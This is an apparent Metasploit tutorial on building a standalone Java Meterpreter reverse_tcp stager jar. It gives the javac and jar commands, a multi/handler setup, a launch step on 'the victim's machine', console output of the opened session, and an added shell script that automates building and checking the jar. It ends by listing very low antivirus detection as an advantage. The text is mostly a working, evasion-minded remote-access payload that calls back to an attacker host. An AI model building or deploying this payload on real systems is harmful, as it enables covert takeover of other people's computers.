The documentation out there on the web is somewhat out of date when it comes to compiling and executing a standalone Java Meterpreter payload, and as this is not yet part of the core features of the Metasploit Framework, I expect these steps to change again in the future. In the past you could use loader.jar to run the payload, but it is no longer included in the tree; instead, compile your own from Payload.java (which is included in the tree):
Create the Meterpreter JAR. The jar holds only the stager: it reads LHOST and LPORT from metasploit.dat, which must sit at the root of the jar, and the -source/-target 1.4 flags keep the class loadable by old JREs (newer JDKs no longer accept 1.4, so use the lowest level your javac supports, which raises the minimum Java version the target needs):

cd ./external/source/javapayload/src/
javac -source 1.4 -target 1.4 metasploit/Payload.java
echo -e "LHOST=10.0.0.1\nLPORT=82" > metasploit.dat
jar cfe payload.jar metasploit.Payload metasploit/Payload.class metasploit.dat
Now set up a handler in the Metasploit console to listen for the connection, with the same LHOST and LPORT that went into metasploit.dat:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(handler) > set LPORT 82
LPORT => 82
msf exploit(handler) > exploit
[*] Started reverse handler on 10.0.0.1:82
[*] Starting the payload handler...
Launch the payload on the victim's machine:
java -jar payload.jar
Wait for the results. Because the jar is only the stager, the handler sends the Meterpreter stage over the connection before the session opens:

[*] Sending stage (28541 bytes) to 192.168.0.1
[*] Meterpreter session 1 opened (10.0.0.1:82 -> 192.168.0.1:54562) at 2012-03-21 09:53:20 +0000
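The build steps above, wrapped into a parameterised script as an added example (this is not code from the original post or from the Metasploit tree). It validates LHOST/LPORT before writing metasploit.dat, uses printf instead of echo -e because echo -e is not portable across /bin/sh implementations, and checks the finished jar for the Main-Class entry and the metasploit.dat resource. The function names, the check step and the usage line are this example's own choices; the paths and the javac flags are the ones from the post.

```shell
#!/bin/sh
# Added example: build the standalone Java Meterpreter stager jar from
# external/source/javapayload/src with a given LHOST/LPORT.
set -eu

# Accept only an IPv4 dotted quad with every octet in 0..255.
valid_ipv4() {
  echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  for octet in $(echo "$1" | tr '.' ' '); do
    [ "$octet" -le 255 ] || return 1
  done
}

# Accept only a TCP port in 1..65535.
valid_port() {
  echo "$1" | grep -Eq '^[0-9]{1,5}$' || return 1
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Write metasploit.dat, the properties file the stager reads for LHOST/LPORT.
# Arguments: lhost lport path. Prints the file content; fails on bad input.
write_payload_dat() {
  lhost=$1; lport=$2; dat_path=$3
  valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
  printf 'LHOST=%s\nLPORT=%s\n' "$lhost" "$lport" > "$dat_path"
  cat "$dat_path"
}

# Compile Payload.java and package it with metasploit.dat at the jar root,
# where the stager looks it up as a classpath resource.
# Arguments: path to external/source/javapayload/src, lhost, lport,
# output jar (use an absolute path: the build runs inside the src directory).
build_payload_jar() {
  src=$1; lhost=$2; lport=$3; jar_out=$4
  ( cd "$src"
    # -source/-target 1.4 as in the post; newer JDKs reject 1.4, so raise this
    # to the oldest level your javac accepts.
    javac -source 1.4 -target 1.4 metasploit/Payload.java
    write_payload_dat "$lhost" "$lport" metasploit.dat > /dev/null
    jar cfe "$jar_out" metasploit.Payload metasploit/Payload.class metasploit.dat )
}

# Sanity-check a built jar: Main-Class points at the stager and metasploit.dat
# is at the root (the manifest written by jar uses CRLF, so anchor only the start).
check_payload_jar() {
  unzip -p "$1" META-INF/MANIFEST.MF | grep -q '^Main-Class: metasploit.Payload' || return 1
  jar tf "$1" | grep -qx 'metasploit.dat'
}

# Usage: ./build.sh /path/to/external/source/javapayload/src 10.0.0.1 82 /tmp/payload.jar
if [ "$#" -eq 4 ]; then
  build_payload_jar "$@" && check_payload_jar "$4" && echo "built and verified $4"
fi
```

The handler side does not change: the LHOST/LPORT passed to this script must match what you set on exploit/multi/handler, and the jar on the target is still launched with java -jar.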
- Antivirus detection of the jar is very low
- Most target machines have a Java runtime installed
- It works
- Only a limited set of post-exploitation modules can be run against a Java Meterpreter session
- Not as functional as a native (shellcode) Meterpreter session